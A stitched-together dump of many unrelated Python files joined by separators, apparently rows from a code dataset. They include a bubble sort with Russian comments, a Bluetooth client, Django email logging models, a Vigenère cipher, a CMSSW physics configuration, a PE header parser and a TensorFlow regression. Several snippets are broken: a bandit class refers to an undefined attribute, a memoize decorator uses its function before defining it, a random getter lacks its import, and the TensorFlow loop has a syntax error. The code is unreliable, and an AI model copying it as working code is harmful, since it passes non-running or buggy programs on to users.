# была ли выполнена на текущем цикле "полезная работа" в виде
# перестановок элементов или нет. Если перестановки были, значит
# можно продолжать сортировать, так как ещё остались неотсортиро-
# ванные элементы,
swapped = False
# Внутренний цикл занимается перестановкой элементов. Выражение
# length - 1 - i вычитает i из length, чтобы ограничить итерацию
# только на НЕотсортированных элементах. Ведь отсортированные эле-
# менты не будут больше переставляться! Соответственно в конце
# коллекции будет набор элементов, зафиксированных в своём положении.
for j in range(length - 1 - i):
# Если текущий элемент больше следующего за ним...
if collection[j] > collection[j + 1]:
# Перестановка имеется, соответственно текущей цикл не
# будет последним, будем сортировать дальше.
swapped = True
# ... То поменять их местами. БОльшее число сместится ближе к концу.
collection[j], collection[j + 1] = collection[j + 1], collection[j]
# Если swapped за текущий цикл перестановок так и не поменяла своё
# значение на True, то значит мы проитерировались по отсортированным
# элементам, соответственно сортировать больше нечего. Конец сортировки.
if not swapped:
break # Прикратить итерацию, если коллекция отсортирована
return collection
if __name__ == "__main__":
user_input = input("Enter numbers separated by a comma:").strip()
unsorted = [int(item) for item in user_input.split(",")]
print(*bubble_sort(unsorted), sep=",")
|
"""
Dox Markdown publishing for ACE.
"""
__help__ = """
Dox is a markdown oriented command line publishing tool for ACE.
After installation, dox requires the following initialization:
ace dox init --content-type=<content-type> --body-field=<body-field> --key-field=<key-field>
This will write the environment in local directory. The content type is the ACE content type
to use for uploaded documents. The body field specifies which field of the content type
should be used for the contents of the body of the documents, and the key field specifies
the unique field by which existing content items can be identified.
Dox also requires a valid project set with the 'ace project set' command, or with the '--project'
flag.
"""
def seed_parser(parser):
"""
Seeds the arg parser.
"""
parser.add_argument('--content-type',dest='content_type',default=None)
parser.add_argument('--body-field',dest='body_field',default=None)
parser.add_argument('--key-field',dest='key_field',default=None)
parser.add_argument('--no-search-index',dest='search_index',action='store_const',const=False,default=True)
parser.add_argument('--no-reset-workflow',dest='reset_workflow',action='store_const',const=False,default=True)
def seed_commands(commands):
"""
Seeds the commands.
"""
from ace.plugins.dox import commands as cmd_functions
dox_commands = {
'init':cmd_functions.init,
'up':cmd_functions.upload,
'upload':cmd_functions.upload,
'keyfields':cmd_functions.keyfields,
'clean':cmd_functions.clean
}
commands['dox'] = dox_commands
|
import sys
import bluetooth
uuid = "1e0ca4ea-299d-4335-93eb-27fcfe7fa848"
service_matches = bluetooth.find_service(name="aaa", uuid=uuid)
if len(service_matches) == 0:
print "couldn't find the aaa Service"
sys.exit(0)
first_match = service_matches[0]
port = first_match["port"]
name = first_match["name"]
host = first_match["host"]
print "connecting to \"%s\" on %s" % (name, host)
print "host application port number is : %s " % port
sock=bluetooth.BluetoothSocket(bluetooth.RFCOMM)
sock.connect((host, port))
sock.send("hello!")
sock.close()
|
from django.db import models
class Blacklist(models.Model):
TYPE_CHOICES = (
(0, 'Bounce'),
(1, 'Complaints'),
)
email = models.EmailField(unique=True)
type = models.PositiveSmallIntegerField(default=0, choices=TYPE_CHOICES)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.email
RESULT_CODES = (
("1", "success"),
("2", "retry"),
("3", "blacklisted"),
)
class MessageLogManager(models.Manager):
def log(self, message, result_code):
subject = message.subject[:250] + '...' if len(message.subject) > 255 else message.subject
self.create(email=message.to[0], subject=subject, result=result_code)
class MessageLog(models.Model):
email = models.EmailField()
subject = models.CharField(max_length=255)
result = models.CharField(max_length=1, choices=RESULT_CODES)
created_at = models.DateTimeField(auto_now_add=True)
objects = MessageLogManager()
def __unicode__(self):
return self.email
|
from __future__ import absolute_import, unicode_literals
from common_services.clients.base import CommonServicesBaseClient
from common_services.models.email import RenderedEmail
class EmailClient(CommonServicesBaseClient):
VERSION = 'v1'
def __init__(self):
# type: () -> None
super(EmailClient, self).__init__()
self.EMAIL_URL = '/{}/email'.format(self.VERSION)
def send(self, recipient, subject_template_path, body_template_path, context, sender_email='ETS', modifier=None,
email_type='default', raise_exc=False):
# type: (str, str, str, dict, str, str, str, bool) -> None
url = '{}/send'.format(self.EMAIL_URL)
resp = self._make_post_request(url, data={
'senderEmail': sender_email,
'recipient': recipient,
'subjectTemplatePath': subject_template_path,
'bodyTemplatePath': body_template_path,
'modifier': modifier,
'context': context,
'emailType': email_type
})
self._handle_service_response(resp, raise_exc=raise_exc)
def send_raw(self, recipient, subject, body, sender_email, content_type, email_type='default', raise_exc=False):
# type: (str, str, str, str, str, str, bool) -> None
url = '{}/send/raw'.format(self.EMAIL_URL)
resp = self._make_post_request(url, data={
'senderEmail': sender_email,
'recipient': recipient,
'subject': subject,
'body': body,
'contentType': content_type,
'emailType': email_type
})
self._handle_service_response(resp, raise_exc=raise_exc)
def render(self, subject_template_path, body_template_path, context, modifier=None, raise_exc=False):
# type: (unicode, unicode, dict, unicode, bool) -> RenderedEmail
url = '{}/render'.format(self.EMAIL_URL)
resp = self._make_post_request(url, data={
'subjectTemplatePath': subject_template_path,
'bodyTemplatePath': body_template_path,
'modifier': modifier,
'context': context,
})
# Raise exception if response is not valid
self._handle_service_response(resp, raise_exc=raise_exc)
# Parse valid response
if resp.status_code in self.SUCCESS_STATUS_CODE_RANGE:
resp = resp.json()
return RenderedEmail(subject=resp.get('subject'), body=resp.get('body'))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date : 2016-11-24 14:22:59
# @Author : Arms (526923945@qq.com)
# @Link : https://armszhou.github.io
# @Version : $Id$
import sys
Zero = [" *** ",
" * * ",
"* *",
"* *",
"* *",
" * * ",
" *** "]
One = [" * ", "** ", " * ", " * ", " * ", " * ", "***"]
Two = [" *** ", "* *", "* * ", " * ", " * ", "* ", "*****"]
Three = [" *** ", "* *", " *", " ** ", " *", "* *", " *** "]
Four = [" * ", " ** ", " * * ", "* * ", "******", " * ",
" * "]
Five = ["*****", "* ", "* ", " *** ", " *", "* *", " *** "]
Six = [" *** ", "* ", "* ", "**** ", "* *", "* *", " *** "]
Seven = ["*****", " *", " * ", " * ", " * ", "* ", "* "]
Eight = [" *** ", "* *", "* *", " *** ", "* *", "* *", " *** "]
Nine = [" ****", "* *", "* *", " ****", " *", " *", " *"]
Digits = [Zero, One, Two, Three, Four, Five, Six, Seven, Eight, Nine]
try:
#获取命令选中的第2个参数
digits = sys.argv[1]
row = 0
while row < 7: #因为我们使用7行的星号来表示一个数字
line = ""
column = 0
while column < len(digits): #len(digits)获取是的字符串长度
number = int(digits[column]) #半第2个参数中的字符转换成数字
digit = Digits[number] #取得大数字对象
# 对比 * 并替换为对应数字
d = 0
while d < len(digit[row]):
c = digit[row][d]
if c == '*':
line += str(number)
else:
line += c
d += 1
line += " " #打印大数字的第row行
column += 1
print(line)
row += 1
except IndexError:
print("usage: bigdigits.py <number>")
except ValueError as err:
print(err, "in", digits)
|
test_case = int(input())
while test_case:
n, m = map(int, input().split())
print(min(2, n - 1) * m)
test_case -= 1
|
class RandomizedCollection:
def __init__(self):
"""
Initialize your data structure here.
"""
self.ms = []
def insert(self, val: int) -> bool:
"""
Inserts a value to the collection. Returns true if the collection did not already contain the specified element.
"""
self.ms.append(val)
if self.ms.count(val)>1:
return False
return True
def remove(self, val: int) -> bool:
"""
Removes a value from the collection. Returns true if the collection contained the specified element.
"""
if val in self.ms:
self.ms.remove(val)
return True
return False
def getRandom(self) -> int:
"""
Get a random element from the collection.
"""
return self.ms[random.randint(0,len(self.ms)-1)]
|
# CD to DAPPER folder
from IPython import get_ipython
IP = get_ipython()
if IP.magic("pwd").endswith('tutorials'):
IP.magic("cd ..")
else:
assert IP.magic("pwd").endswith("DAPPER")
# Load DAPPER
from common import *
# Load answers
from tutorials.resources.answers import answers, show_answer
# Load widgets
from ipywidgets import *
####################################
# DA video
####################################
import io
import base64
from IPython.display import HTML
def envisat_video():
caption = """Illustration of DA for the ozone layer in 2002.
<br><br>
LEFT: Satellite data (i.e. all that is observed).
RIGHT: Simulation model with assimilated data.
<br><br>
Could you have perceived the <a href='http://dx.doi.org/10.1175/JAS-3337.1'>splitting of the ozone hole.</a> only from the satellite data?
<br><br>
Attribution: William A. Lahoz, DARC.
"""
video = io.open('./data/figs/anims/darc_envisat_analyses.mp4', 'r+b').read()
encoded = base64.b64encode(video)
vid = HTML(data='''
<figure style="width:580px;">
<video alt="{1}" controls style="width:550px;">
<source src="data:video/mp4;base64,{0}" type="video/mp4" />
</video>
<figcaption style="background-color:#d9e7ff;">{1}</figcaption>
</figure>
'''.format(encoded.decode('ascii'),caption))
return vid
####################################
# EnKF animation
####################################
# from matplotlib.image import imread
#
# # Hack to keep line-spacing constant with/out TeX
# LE = '\phantom{$\{x_n^f\}_{n=1}^N$}'
#
# txts = [chr(i+97) for i in range(9)]
# txts[0] = 'We consider a single cycle of the EnKF,'+\
# 'starting with the analysis state at time $(t-1)$.'+LE+'\n'+\
# 'The contours are "equipotential" curves of $\|x-\mu_{t-1}\|_{P_{t-1}}$.'+LE
# txts[1] = 'The ensemble $\{x_n^a\}_{n=1}^N$ is (assumed) sampled from this distribution.'+LE+'\n'+LE
# txts[2] = 'The ensemble is forecasted from time $(t-1)$ to $t$ '+\
# 'using the dynamical model $f$.'+LE+'\n'+\
# 'We now denote it using the superscript $f$.'+LE
# txts[3] = 'Now we consider the analysis at time t. The ensemble is used'+LE+'\n'+\
# 'to estimate $\mu^f_t$ and $P^f_t$, i.e. the new contour curves.'+LE
# txts[4] = 'The likelihood is taken into account...'+LE+'\n'+LE
# txts[5] = '...which implicitly yields this posterior.' +LE+'\n'+LE
# txts[6] = 'Explicitly, however,'+LE+'\n'+\
# 'we compute the Kalman gain, based on the ensemble estimates.'+LE
# txts[7] = 'The Kalman gain is then used to shift the ensemble such that it represents' +LE+'\n'+\
# 'the (implicit) posterior. The cycle can then begin again, now from $t$ to $t+1$.'+LE
#
# def crop(img):
# top = int( 0.05*img.shape[0])
# btm = int((1-0.08)*img.shape[0])
# lft = int( 0.01*img.shape[1])
# rgt = int((1-0.01)*img.shape[1])
# return img[top:btm,lft:rgt]
#
# def illust_EnKF(i):
# with sns.axes_style("white"):
# plt.figure(1,figsize=(10,12))
# axI = plt.subplot(111)
# axI.set_axis_off()
# axI.set_title(txts[i],loc='left',usetex=True,size=15)
# axI.imshow(crop(imread('./tutorials/resources/illust_EnKF/illust_EnKF_prez_'+str(i+8)+'.png')))
# # Extract text:
# #plt.savefig("images/txts_"+str(i+8)+'.png')
# #bash: for f in `ls txts_*.png`; do convert -crop 800x110+120+260 $f $f; done
#
# EnKF_animation = interactive(illust_EnKF,i=IntSlider(min=0, max=7,continuous_update=False))
wI = Image(
value=open("./tutorials/resources/illust_EnKF/illust_EnKF_prez_8.png", "rb").read(),
format='png',
width=600,
height=400,
)
wT = Image(
value=open("./tutorials/resources/illust_EnKF/txts_8.png", "rb").read(),
format='png',
width=600,
height=50,
)
def show_image(i=0):
img = "./tutorials/resources/illust_EnKF/illust_EnKF_prez_"+str(i+8)+".png"
txt = "./tutorials/resources/illust_EnKF/txts_"+str(i+8)+".png"
wI.value=open(img, "rb").read()
wT.value=open(txt, "rb").read()
wS = interactive(show_image,i=(0,7,1))
EnKF_animation = VBox([wS,wT,wI])
####################################
# Misc
####################################
def plot_ensemble(E):
E_with_NaNs = np.hstack([np.tile(E,(1,2)),np.nan*ones((len(E),1))]).ravel()
Heights = plt.ylim()[1]*0.5*np.tile(arange(3),(len(E),1)).ravel()
plt.plot(E_with_NaNs,Heights,'k',lw=0.5,alpha=0.4,label="ensemble")
def piece_wise_DA_step_lines(xf,xa=None):
if xa is None:
xa = xf
else:
assert len(xf)==len(xa)
# Assemble piece-wise lines for plotting purposes
pw_f = array([[xa[k ], xf[k+1], nan] for k in range(len(xf)-1)]).ravel()
pw_a = array([[xf[k+1], xa[k+1], nan] for k in range(len(xf)-1)]).ravel()
return pw_f, pw_a
|
#solve for x
def solve_equation(equation):
x, add, num1, equal, num2 = equation.split()
num1, num2 = int(num1), int(num2)
return "x =" + str(num2 - num1)
print(solve_equation("x + 4 = 9"))
|
import pytest
if __name__ == "__main__":
pytest.run([__file__])
|
#coding:utf-8
def script(s, player=None):
from NaoQuest.objective import Objective
from NaoSensor.plant import Plant
import NaoCreator.SGBDDialogue.creer as bd
import NaoCreator.Tool.speech_move as sm
if not player:
print("Error in execution of post_script \"testobj1_post\": player is None")
return
if not s.completed:
p1 = bd.Creer(bd.Instruction, bd.DicoVide, 30)
p2 = bd.Creer(bd.Instruction, bd.DicoVide, 31)
p3 = bd.Creer(bd.Instruction, bd.DicoVide, 32)
p4 = bd.Creer(bd.Instruction, bd.DicoVide, 33)
sm.speech_and_move(p1.out() + p2.out() + p3.out() + p4.out())
s.completed = True
else:
s.wait_for = False
|
import time
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
class Ckeditor:
def __init__(self, driver: webdriver, wait: WebDriverWait):
self.browser = driver
self.wait = wait
def post(self, css_seletor: str, message: str = 'Enviado usando o Selenium'):
time.sleep(1)
iframe = self.browser.switch_to.active_element
self.browser.switch_to.frame(iframe)
ckeditor = self.browser.find_element_by_css_selector(
'[contenteditable="true"]')
ckeditor.clear()
ckeditor.send_keys(message)
self.browser.switch_to.parent_frame()
self.browser.find_element_by_css_selector(css_seletor).click()
|
alphalist = [letter for letter in 'abcdefghijklmnopqrstuvwxyz']
tonum = dict(zip(alphalist, range(0, 26)))
toalpha = dict(zip(range(0, 26), alphalist))
def encrypt(plaintext, key):
ciphertext = ''
cipherkey = ''
plaintext = ''.join(plaintext.lower().split())
for i in range(len(plaintext)):
cipherkey += key[i % len(key)]
ciphertext += toalpha[(tonum[plaintext[i]] + tonum[cipherkey[i]]) % 26]
return ciphertext
def decrypt(ciphertext, key):
plaintext = ''
cipherkey = ''
for i in range(len(ciphertext)):
cipherkey += key[i % len(key)]
plaintext += toalpha[(tonum[ciphertext[i]] - tonum[cipherkey[i]]) % 26]
return plaintext
def main():
plaintext = 'The quick brown fox jumped over the lazy dog'
cipherkey = 'helloworld'
ciphertext = encrypt(plaintext, cipherkey)
decipheredtext = decrypt(ciphertext, cipherkey)
print('plaintext: {}'.format(plaintext))
print('cipherkey: {}'.format(cipherkey))
print('ciphertext: {}'.format(ciphertext))
print('decipheredtext: {}'.format(decipheredtext))
if __name__ == '__main__':
main()
|
# Auto generated configuration file
# using:
# Revision: 1.381.2.13
# Source: /local/reps/CMSSW/CMSSW/Configuration/PyReleaseValidation/python/ConfigBuilder.py,v
# with command line options: data -s RAW2DIGI,L1Reco,RECO --eventcontent RECO --conditions auto:com10 -n 500 --no_exec --data --scenario pp --process RERECO
import FWCore.ParameterSet.Config as cms
process = cms.Process('RERECO')
#
process = cms.Process("HistoEnergy")
#
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load('Configuration.StandardSequences.RawToDigi_Data_cff')
process.load('Configuration.StandardSequences.L1Reco_cff')
process.load('Configuration.StandardSequences.Reconstruction_Data_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(100)
)
# Input source
process.source = cms.Source("PoolSource",
secondaryFileNames = cms.untracked.vstring(),
fileNames = cms.untracked.vstring(
'root://eoscms//eos/cms/store/data/Run2012A/MinimumBias/RAW/v1/000/191/226/FA549004-0886-E111-AB6F-BCAEC518FF6E.root',
)
#process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(False)
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.381.2.13 $'),
annotation = cms.untracked.string('data nevts:500'),
name = cms.untracked.string('PyReleaseValidation')
)
#HLTStream
process.hltAlCaPhiSymStream = cms.EDFilter( "HLTEcalPhiSymFilter",
statusThreshold = cms.uint32( 3 ),
barrelDigiCollection = cms.InputTag('ecalDigis','ebDigis'),
endcapDigiCollection = cms.InputTag('ecalDigis','eeDigis'),
barrelUncalibHitCollection = cms.InputTag("ecalMultiFitUncalibRecHit","EcalUncalibRecHitsEB"),
endcapUncalibHitCollection = cms.InputTag("ecalMultiFitUncalibRecHit","EcalUncalibRecHitsEE"),
barrelHitCollection = cms.InputTag('ecalRecHit','EcalRecHitsEB'),
endcapHitCollection = cms.InputTag('ecalRecHit','EcalRecHitsEE'),
ampCutADC_barrel = cms.double( 4.5 ),
ampCutADC_endcap = cms.double( 7.0 ),
eCut_endcap_high = cms.double( 999999.0 ),
eCut_barrel = cms.double( 0.15 ),
eCut_barrel_high = cms.double( 999999.0 ),
eCut_endcap = cms.double( 0.75 ),
useRecoFlag = cms.bool( False ),
phiSymBarrelDigiCollection = cms.string( "phiSymEcalDigisEB" ),
phiSymEndcapDigiCollection = cms.string( "phiSymEcalDigisEE" ),
phiSymBarrelHitCollection = cms.string( "phiSymEcalRecHitsEB" ),
phiSymEndcapHitCollection = cms.string( "phiSymEcalRecHitsEE" )
)
# Output definition
process.RECOSIMoutput = cms.OutputModule("PoolOutputModule",
splitLevel = cms.untracked.int32(0),
eventAutoFlushCompressedSize = cms.untracked.int32(5242880),
outputCommands = process.RECOSIMEventContent.outputCommands,
fileName = cms.untracked.string('AlCaPhiSym_stream_RAW2DIGI_RECO.root'),
dataset = cms.untracked.PSet(
filterName = cms.untracked.string(''),
dataTier = cms.untracked.string('')
)
)
#
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
#process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:com10', '')
process.GlobalTag = GlobalTag(process.GlobalTag, 'GR_R_73_V0A::All', '')
# Path and EndPath definitions
process.raw2digi_step = cms.Path(process.RawToDigi)
process.L1Reco_step = cms.Path(process.L1Reco)
process.reconstruction_step = cms.Path(process.reconstruction*process.hltAlCaPhiSymStream)
#process.hltAlCaPhiSymStream_step = cms.Path(process.hltAlCaPhiSymStream)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.RECOSIMoutput_step = cms.EndPath(process.RECOSIMoutput)
process.RECOSIMoutput.outputCommands.append('keep *')
#process.RECOSIMoutput.outputCommands.append('keep phiSymEcalDigisEB_*_*_*')
#process.RECOSIMoutput.outputCommands.append('keep phiSymEcalDigisEE_*_*_*')
#process.RECOSIMoutput.outputCommands.append('keep phiSymEcalRecHitsEB_*_*_*')
#process.RECOSIMoutput.outputCommands.append('keep phiSymEcalRecHitsEE_*_*_*')
# Schedule definition
process.schedule = cms.Schedule(process.raw2digi_step,process.L1Reco_step,process.reconstruction_step,process.endjob_step,process.RECOSIMoutput_step)
|
print(id("a"))
x = "a"
print(id(x))
#basically eveything is assigned to a
# specific part of memory, which will always change from computer to computer
# but doing print(id("")) will point to the memory identiifed on local computer
|
if __name__ == '__main__':
print("Banknotes problem:\n")
banknotes_romania = [1, 5, 10, 50, 100, 200, 500]
print(banknotes_romania, '\n')
from random import randint
price = randint(5, 1000)
print(f"The price is: {price}\n")
from collections import OrderedDict
solution = OrderedDict()
total_sum = 0
done = False
for banknote in banknotes_romania[::-1]:
if total_sum + banknote == price:
solution[banknote] = solution.get(banknote, 0) + 1
break
while total_sum + banknote < price:
total_sum += banknote
solution[banknote] = solution.get(banknote, 0) + 1
if total_sum + banknote == price:
solution[banknote] = solution.get(banknote, 0) + 1
done = True
if done:
break
print(f"For completing the sum of {price} lei we needed:")
for banknote in solution:
print(f"- {solution[banknote]} banknote of {banknote} lei.")
|
import numpy as np
import matplotlib.pyplot as plt
class Bandit:
def __init__(self, true_mean):
self.true_mean = true_mean
self.mean = 0
self.counter = 0
def pull_handle(self):
return np.random.rand() + self.id
|
import array
import numpy as np
import matplotlib.pyplot as plt
import rootpy.ROOT as ROOT
from peaks import peaks
p=peaks("total.root")
speMean=[]
speSigma=[]
mpeSpeMean=[]
spe_mpeRatio=[]
mpeMean=[]
mpeSigma=[]
PE=[]
mean_sig2=[]
for sn in p.snDict['spe']:
meanS=p.fitDict["spe","mean",sn]
sigS=p.fitDict["spe","sigma",sn]
meanM=p.fitDict["mpe","mean",sn]
rat=meanM/meanS
speMean.append(meanS)
mpeSpeMean.append(meanM)
speSigma.append(sigS)
spe_mpeRatio.append(rat)
sigSpeMean=np.array(speSigma).mean()
meanMpeSpeRatio= np.array(spe_mpeRatio).mean()
aveSpeMean=np.array(speMean).mean()
sig_spe=sigSpeMean/aveSpeMean
norm=sig_spe*sig_spe+1
print aveSpeMean
chek=[]
for sn in p.snDict['mpe']:
sigMpe=p.fitDict["mpe","sigma",sn]
meanMpe=p.fitDict["mpe","mean",sn]
rat=sigMpe/(aveSpeMean*norm)
PE.append(rat*rat)
rat2=meanMpe/sigMpe
mean_sig2.append(rat2*rat2)
ratio=rat/rat2
chek.append(ratio*ratio)
p.plotHist("all",320)
raw_input()
#spe=[]
#print p.snDict["spe"]
#for sn in p.snDict["spe"]:
#print str(sn)+" "+str(p.fitDict["spe","mean",sn])
#spe.append(p.fitDict["spe","mean",sn])
#plt.hist(spe)
#plt.show()
#print np.array(PE).mean()
#print np.array(mean_sig2).mean()
#print np.array(chek).mean()
#plt.hist(mean_sig2)
#plt.show()
#plt.hist(chek)
#plt.show()
#p.plotParameter("sig2","sig2")
#p.plotParameter("mpe/spe","mpe/spe")
#p.plotParameter("spe","mean")
#p.plotParameter("spe","sigma")
#p.plotParameter("spe","ratio")
#p.plotParameter("mpe","mean")
#p.plotParameter("mpe","sigma")
#p.plotParameter("best","pe")
#p.plotParameter("mpe","ratio")
#p.plotParameter("back","mean")
#p.plotParameter("back","sigma")
#p.plotParameter("back","ratio")
############
|
#!/usr/bin/python3
#minimalist python pe library
import sys
import argparse
import struct
import PEHeader
class Decoder:
def __init__(self,_filename="",_fileperms="rb"):
self._header = PEHeader.PEHeader()
self.fields = self._header.header_fields
self.fmt_dict = self._header.header_fmt_dict
self.fmt = "".join([self.fmt_dict[name] for name in self.fields])
self.fmt_len = struct.calcsize(self.fmt)
self.len = 0
self.original_file = _filename
self.decoded_file = ""
self.fileperms = _fileperms
def decode(self,_start=0):
self.decoded_file = None
with open(self.original_file,self.fileperms) as raw_pe:
extra = raw_pe.read(_start)
_bytes = raw_pe.read(self.fmt_len)
try:
self.decoded_file = struct.unpack(self.fmt,_bytes)
except struct.error:
self.len = 0
return None,self.len
self.len = len(extra)+len(_bytes)
return self.decoded_file,self.len
def decode_field(self,index):
return self.fields[index]
|
# Copyright 2018 Cable Television Laboratories, Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from drp_python.exceptions.http_exceptions import AuthorizationError, \
ConnectionError
from drp_python.exceptions.drb_exceptions import NotFoundError, \
AlreadyExistsError
from drp_python.translation_layer.params_translation import \
ParamsTranslation, get_all_params
import logging
logger = logging.getLogger('drp-params')
class Params:
"""
Client Params Object
"""
def __init__(self, session, client_params):
logger.debug('__init__')
self.__params_config = client_params
self.__api = ParamsTranslation(session)
self.__api.open()
try:
self.__params_model = self.get()
except NotFoundError:
self.__params_model = None
def is_valid(self):
return self.__params_model is not None
def create(self):
logger.debug('create')
if self.__params_model:
raise AlreadyExistsError(self.__params_model.name,
'Params with that name already exists')
else:
self.__params_model = self.__api.create_params(
self.__params_config)
def update(self, updated_object):
if self.__params_model:
self.__params_model = self.__api.update_params(
updated_object, self.__params_model.name)
else:
self.__params_model = self.__api.create_params(
updated_object)
def delete(self):
if self.__params_model:
self.__api.delete_params(self.__params_model.name)
self.__params_model = None
def get(self):
return self.__api.get_params(self.__params_config.name)
def set_machine_param(self, machine):
machine.add_param_values(self.__params_config)
def get_all(session):
"""
Fetches all params form DRP
Note this data is not cached
:return: List of Params
"""
try:
params_list = get_all_params(session)
return params_list
except ConnectionError as error:
logger.error(error)
raise error
except AuthorizationError as error:
logger.error(error)
raise error
|
# -*- coding: utf-8 -*-
"""
utils.py
Utility functions using to analysis and evaluate solutions
Function list:
timepast
memoize
clear_cython_cache
find_solution
generate_catalogue_draft
find_keyword_in_solutions
@author: Jasper Wu
"""
import os
import functools
import shutil
import time
import webbrowser
import inspect
from inspect import getmembers, signature
def timepast(func):
@functools.wraps(func)
def _deco(*args, **kwargs):
t = time.time()
print("Func {0}() begins at: {1}".format(func.__name__, time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(t))))
ret = func(*args, **kwargs)
print("Time consumed by {0}(): {1:.2f}s".format(func.__name__, time.time() - t))
return ret
return _deco
def memoize(cache={}, key=lambda x: x):
@functools.wraps(func)
def _deco(func):
def __deco(*args, **kwargs):
idx = key(args)
if idx not in cache:
cache[idx] = func(*args, **kwargs)
return cache[idx]
return __deco
return _deco
def clear_cython_cache():
url = os.path.expanduser("~\\.ipython\\cython")
if os.path.exists(url):
for f in os.listdir(url):
filepath = os.path.join(url, f)
if '.' in f:
os.remove(filepath)
else:
shutil.rmtree(filepath)
else:
raise ValueError("Cython cache not found: {}".format(url))
def generate_catalogue_draft(module):
def print_func_info(name, func):
try:
sig = str(signature(func))
except:
sig = "(<unknown>)"
name += sig
doc = func.__doc__
if not doc:
doc = name + "\n"
elif sig == "(<unknown>)":
doc = "{}\n".format(doc.replace("\n\n", "\n").replace("\n", "\n "))
elif not doc.startswith("\n"):
doc = "{}\n {}\n".format(name, doc)
else:
doc = name + doc
print(doc)
blocklist = ["Rational", "Symbol", "deepcopy"]
basic_pool = dict(getmembers(module, inspect.isfunction))
basic_pool.update(dict(getmembers(module, inspect.isbuiltin)))
basic_pool.update(dict(getmembers(module, inspect.isclass)))
print("{}:\n".format(module.__name__))
for name in sorted(basic_pool):
print_func_info(name, basic_pool[name])
for submodule_name in ["equation", "linalg", "numclass", "polynomial"]:
submodule = getattr(module, submodule_name)
print("\n{}:\n".format(submodule.__name__))
pool = getmembers(submodule, inspect.isfunction) + \
getmembers(submodule, inspect.isbuiltin) + \
getmembers(submodule, inspect.isclass)
for name, func in sorted(pool):
if name not in basic_pool and name not in blocklist and not name.startswith("_"):
print_func_info(name, func)
def find_keyword_in_solutions(keyword, folder=r"E:\Project Euler\ProjectEulerSolutions"):
keyword = keyword.lower()
solutions = [file for file in os.listdir(folder) if file.endswith("ipynb")]
check = []
for file in solutions[::-1]:
with open(os.path.join(folder, file), 'r', encoding="utf-8") as data:
data = data.readlines()
for i, line in enumerate(data):
if keyword in line.lower():
check.append(file.replace("ipynb", "html"))
break
for file in check:
print(file)
def find_solution(id):
if id % 10 == 0:
lid, rid = id-9, id
else:
lid, rid = id // 10 * 10 + 1, id // 10 * 10 + 10
# webbrowser.open('http://htmlpreview.github.io/?https://github.com/ColdHumour/ProjectEulerSolutions/blob/master/Solutions%20{}-{}.html#{}'.format(lid, rid, id))
webbrowser.open('file:///E:/Project Euler/ProjectEulerSolutions/Solutions%20{}-{}.html#{}'.format(lid, rid, id))
|
import io
s = io.StringIO()
s.write(u'Hello World\n')
print('This is a test', file=s)
print s.getvalue()
s = io.StringIO(u'Hello World\n')
print s.read(4)
print s.read()
s = io.BytesIO()
s.write(b'binary data')
print s.getvalue()
|
import tensorflow as tf
tf.set_random_seed(777)
w = tf.Variable(tf.random_normal([1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')
x = tf.placeholder(tf.float32, shape=[None])
y = tf.placeholder(tf.float32, shape=[None])
hypothesis = x * w + b
#cost loss function
cost = tf.reduce_mean(tf.square(hypothesis - y))
# optimzier
train = tf.train.GradientDescentOptimizer(learning_rate = 0.01).minimize(cost)
# Launch the graph in a session
with tf.Session() as sess:
#Initializes global variables in the graph
sess.run(tf.global_variables_initializer())
#Fit the Line
for step in range(2001):
_, cost_val, w_val, b_val = sess.run( ,
feed_dict={x:[1,2,3,4,5], y:[2.1, 3.1, 4.1, 5.1, 6.1]})
if step % 20 == 0:
print(step, cost_val, w_val, b_val )
#Testing our model #predict
print(sess.run(hypothesis, feed_dict={x:[5]}))
print(sess.run(hypothesis, feed_dict={x:[2.5]}))
print(sess.run(hypothesis, feed_dict={x:[1.5, 3.5]}))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.